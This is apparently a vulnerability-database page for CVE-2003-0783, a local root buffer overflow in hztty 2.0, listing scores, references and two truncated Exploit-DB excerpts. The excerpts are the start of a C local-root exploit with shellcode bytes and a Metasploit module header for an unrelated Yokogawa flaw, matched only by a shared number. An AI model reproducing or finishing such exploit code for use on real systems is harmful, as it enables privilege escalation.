CVE-2003-0783
published 2003-10-06CVE-2003-0783: Multiple buffer overflows in hztty 2.0 allow local users to gain root privileges.
PriorityP427high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.06%
60.2th percentile
Multiple buffer overflows in hztty 2.0 allow local users to gain root privileges.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| yongguang_zhang | hztty | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Yokogawa CENTUM CS 3000 - 'BKHOdeq.exe' Remote Buffer Overflow (Metasploit)
exploitdb·2014-03-12
CVE-2014-0783 Yokogawa CENTUM CS 3000 - 'BKHOdeq.exe' Remote Buffer Overflow (Metasploit)
Yokogawa CENTUM CS 3000 - 'BKHOdeq.exe' Remote Buffer Overflow (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability
exists in the service BKHOdeq.exe when handling specially crafted packets. This module has
been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3 and Windows
2003 SP2.
},
'Author' =>
[
'juan vazquez',
'Redsadic '
],
'References' =>
[
[ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ],
[ 'URL', 'https://community.rapid7.c
Exploit-DB
hztty 2.0 (RedHat 9.0) - Local Privilege Escalation
exploitdb·2003-09-21
CVE-2003-0783 hztty 2.0 (RedHat 9.0) - Local Privilege Escalation
hztty 2.0 (RedHat 9.0) - Local Privilege Escalation
---
/* 0x333hztty => hztty 2.0 local root exploit
*
*
* more info : Debian Security Advisory DSA 385-1
*
* *note* I adjusted some part of hztty's code since
* there were some errors. hope this will not influence
* exploitation :> tested against Red Hat 9.0 :
*
* [c0wboy@0x333 c0wboy]$ gcc 0x333hztty.c -o k
* [c0wboy@0x333 c0wboy]$ ./k
*
* --- local root exploit for hztty 2.0 ---
* --- coded by c0wboy ~ 0x33 ---
*
* sh-2.05b# [./hztty started] [using /dev/ttyp6]
* sh-2.05b$ sh-2.05b# uid=0(root) gid=0(root) groups=500(c0wboy)
* sh-2.05b#
*
* coded by c0wboy
*
* (c) 0x333 Outsiders Security Labs
*
*/
#include
#include
#define BIN "./hztty"
#define SIZE 272
unsigned char shellcode[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8"
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=106424495804417&w=2http://secunia.com/advisories/9792http://securitytracker.com/id?1007756http://securitytracker.com/id?1007757http://www.debian.org/security/2003/dsa-385http://www.osvdb.org/7119http://www.securityfocus.com/bid/8656https://exchange.xforce.ibmcloud.com/vulnerabilities/13243http://marc.info/?l=bugtraq&m=106424495804417&w=2http://secunia.com/advisories/9792http://securitytracker.com/id?1007756http://securitytracker.com/id?1007757http://www.debian.org/security/2003/dsa-385http://www.osvdb.org/7119http://www.securityfocus.com/bid/8656https://exchange.xforce.ibmcloud.com/vulnerabilities/13243
2003-10-06
Published